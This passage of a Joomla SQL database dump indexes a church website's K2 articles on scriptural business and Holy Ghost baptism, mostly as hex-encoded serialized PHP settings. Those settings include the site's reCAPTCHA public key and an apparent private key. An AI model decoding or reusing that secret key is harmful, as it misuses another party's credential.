d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2231223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a383a2246696e616e636573223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a31313a2231323a627573696e657373223b733a373a22636174736c7567223b733a31303a22343a66696e616e636573223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a32393a22636f6d706f6e656e742f6b322f6974656d2f31322d627573696e657373223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a383a2246696e616e636573223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a383a2246696e616e636573223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3132223b733a353a22726f757465223b733a34383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31323a627573696e657373223b733a353a227469746c65223b733a33363a22486f7720746f205374617274206120427573696e657373205363726970747572616c6c79223b733a31313a226465736372697074696f6e223b733a3433313a2220546578743a2050726f766572627320333a392d31302c2031303a32322c204465757465726f6e6f6d792032383a382c2032363a312d322c204c65766974696375732032373a33302c204949204368726f6e69636c65732033313a352e20494e54524f44554354494f4e20476f642773206578706563746174696f6e20666f72206869732070656f706c65206973207468617420746865792077696c6c206c656e6420746f206d616e79206e6174696f6e7320616e64206e6f7420626f72726f772c20746865792077696c6c20626520656d706c6f79657273206f66206c61626f722077697468206d756c7469706c652073747265616d73206f6620696e636f6d652e204974206973206e6f7420656e6f75676820746f2068617665206120706179696e67206a6f62206f7220612073616c617279206a6f623b20796f75206e65656420746f206d616b65206d6f726520726f6f6d20666f722074686520626c657373696e6773206f6620476f64207468617420617265206475652075706f6e20796f7572206c696665207468726f756768206d756c7469706c652073747265616d73206f6620696e636f6d652e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d30312031313a32383a3536223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d30312031313a32383a3536223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(233, 'index.php?option=com_k2&view=item&id=9', 'index.php?option=com_k2&view=item&id=9:how-to-receive-holy-ghost-baptism', 'How to Receive Holy Ghost Baptism', ' By asking for Him in the place of prayer i.e. you personally desire Him, you have to understand that the promise of the Holy Ghost is meant for you and your children (Acts 2:39). Yielding yourself to the Holy Ghost, the power of God is going to come upon you and you will begin to speak in tongues, which is the evidence of the Holy Ghost baptism. Acts 2:1-4, 10:44-46. ', '2017-06-25 14:18:18', 'bb8adc731dbc3cd2397f6b04788ef6ac', 1, 1, 1, '*', '2016-12-31 21:47:43', '0000-00-00 00:00:00', '2016-12-31 21:47:43', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a313a2239223b733a353a22616c696173223b733a33333a22686f772d746f2d726563656976652d686f6c792d67686f73742d6261707469736d223b733a373a2273756d6d617279223b733a3337383a223c703e42792061736b696e6720666f722048696d20696e2074686520706c616365206f662070726179657220692e652e20796f7520706572736f6e616c6c79206465736972652048696d2c20796f75206861766520746f20756e6465727374616e642074686174207468652070726f6d697365206f662074686520486f6c792047686f7374206973206d65616e7420666f7220796f7520616e6420796f7572206368696c6472656e20284163747320323a3339292e205969656c64696e6720796f757273656c6620746f2074686520486f6c792047686f73742c2074686520706f776572206f6620476f6420697320676f696e6720746f20636f6d652075706f6e20796f7520616e6420796f752077696c6c20626567696e20746f20737065616b20696e20746f6e677565732c207768696368206973207468652065766964656e6365206f662074686520486f6c792047686f7374206261707469736d2e204163747320323a312d342c2031303a34342d34362e3c2f703e0d0a223b733a343a22626f6479223b733a313234383a220d0a3c703e4279206c6179696e67206f6e206f662068616e6473206f6620612073657276616e74206f6620476f643a20412067656e75696e652063616c6c6564206d696e6973746572206f6620476f64206d696e697374657220486f6c792047686f7374206261707469736d20746f20796f75206279206c6179696e67206869732068616e6473206f6e20796f7520616e642070726179696e6720666f7220796f752e20416374732031393a322d362c204163747320363a362e3c2f703e0d0a3c703e49742073686f756c64206265206e6f7465642074686174207468652073616d652073746f726d73206f66206c6966652063616d6520616761696e7374207468652062656c696576657220616e642074686520756e62656c69657665722c20627574207468652062656c69657665722068617320616e20616476616e746167652077686963682069732074686520486f6c792047686f73742e20526563656976652074686520486f6c792047686f7374206261707469736d2062656361757365207468652070726f6d69736520697320666f7220796f75206e6f7720616e6420666f722067656e65726174696f6e7320746861742061726520636f6d696e6720616674657220796f7520696620746865204c6f726420746172726965732e205265616420416374732031393a312d362c204163747320323a3420746f2068696d20616e64207468656e207072617920666f722068696d2e20456e636f75726167652068696d20746f20737461727420737065616b696e672074686520776f726473206173207468657920636f6d652e3c2f703e0d0a3c6f6c3e0d0a3c6c693e446f6ee280997473206f662054686520486f6c792047686f7374204261707469736d3c2f6c693e0d0a3c6c693e446f6ee28099742074656163682068696d20796f7572206f776e20746f6e677565732e3c2f6c693e0d0a3c6c693e446f6ee280997420657175616c2048616c6c656c756a616820696e206120666173742077617920746f20737065616b696e6720696e20746f6e677565732e3c2f6c693e0d0a3c6c693e446f6ee2809974206d697374616b6520612064656d6f6e6963206d616e69666573746174696f6e20666f7220486f6c792047686f7374206d6f76652e3c2f6c693e0d0a3c6c693e446f6ee28099742067657420646973636f75726167656420696620686520646f65736ee280997420737065616b20696d6d6564696174656c792c20656e636f75726167652068696d20746f206b656570206170706c79696e6720666169746820616e64206765742068696d206120636f7079206f6620e2809c57686174206d65616e65746820746869733fe2809d3c2f6c693e0d0a3c6c693e446f6ee2809974206d696e697374657220486f6c792047686f7374206261707469736d20746f20612073696e6e65722c206f6e652074686174206973206e6f742079657420626f726e20616761696e20283120436f722e20323a31342c2061736365727461696e2068697320636f6e76657273696f6e206669727374292e3c2f6c693e0d0a3c6c693e4c6173746c792c20656e636f75726167652068696d206265796f6e6420737065616b696e6720696e20746f6e677565732e204c65742068696d2073747564792e203120436f722e2031322c2031343b204a6f686e2031342c2031362c20526f6d616e7320382e3c2f6c693e0d0a3c2f6f6c3e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d30312030373a30363a3139223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b73